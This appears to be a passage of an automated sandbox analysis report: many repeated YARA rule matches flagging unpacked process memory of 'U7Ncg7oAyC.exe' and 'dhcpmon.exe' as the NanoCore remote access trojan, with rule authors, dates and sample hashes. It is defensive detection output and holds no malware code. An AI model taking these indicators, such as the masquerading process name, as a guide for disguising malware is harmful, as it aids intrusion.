        Source: 34.2.dhcpmon.exe.3f3560b.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 34.2.dhcpmon.exe.3f3560b.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.U7Ncg7oAyC.exe.44104b0.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.U7Ncg7oAyC.exe.44104b0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 19.2.U7Ncg7oAyC.exe.44104b0.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 30.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 30.2.U7Ncg7oAyC.exe.3349530.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 30.2.U7Ncg7oAyC.exe.3349530.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 30.2.U7Ncg7oAyC.exe.3349530.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 34.0.dhcpmon.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.0.dhcpmon.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 34.0.dhcpmon.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 34.0.dhcpmon.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.4dd04b0.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.4dd04b0.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.2.dhcpmon.exe.4dd04b0.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 22.2.dhcpmon.exe.4dd04b0.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 6.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 30.2.U7Ncg7oAyC.exe.3349530.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 30.2.U7Ncg7oAyC.exe.3349530.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 30.2.U7Ncg7oAyC.exe.3349530.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 6.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.3aab041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.U7Ncg7oAyC.exe.3aab041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.U7Ncg7oAyC.exe.3aab041.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 24.2.dhcpmon.exe.4414cd0.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 24.2.dhcpmon.exe.4414cd0.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 24.2.dhcpmon.exe.4414cd0.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 24.2.dhcpmon.exe.4414cd0.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.2aa9d50.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.U7Ncg7oAyC.exe.2aa9d50.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.U7Ncg7oAyC.exe.2aa9d50.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 6.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 30.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 30.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 30.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 30.0.U7Ncg7oAyC.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 6.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.0.dhcpmon.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.0.dhcpmon.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 34.0.dhcpmon.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 34.0.dhcpmon.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 34.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 34.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 30.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 30.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 30.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 30.0.U7Ncg7oAyC.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.52c4629.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.U7Ncg7oAyC.exe.52c4629.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.U7Ncg7oAyC.exe.52c4629.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 22.2.dhcpmon.exe.4d99e90.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.4d99e90.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 22.2.dhcpmon.exe.4d99e90.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.2aa4ef0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.U7Ncg7oAyC.exe.2aa4ef0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.U7Ncg7oAyC.exe.2aa4ef0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 0.2.U7Ncg7oAyC.exe.4af04b0.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.0.dhcpmon.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.0.dhcpmon.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 34.0.dhcpmon.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 34.0.dhcpmon.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 24.2.dhcpmon.exe.43e04b0.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 24.2.dhcpmon.exe.43e04b0.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 24.2.dhcpmon.exe.43e04b0.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 30.2.U7Ncg7oAyC.exe.334e590.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 30.2.U7Ncg7oAyC.exe.334e590.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 30.2.U7Ncg7oAyC.exe.334e590.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 22.2.dhcpmon.exe.4e04cd0.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
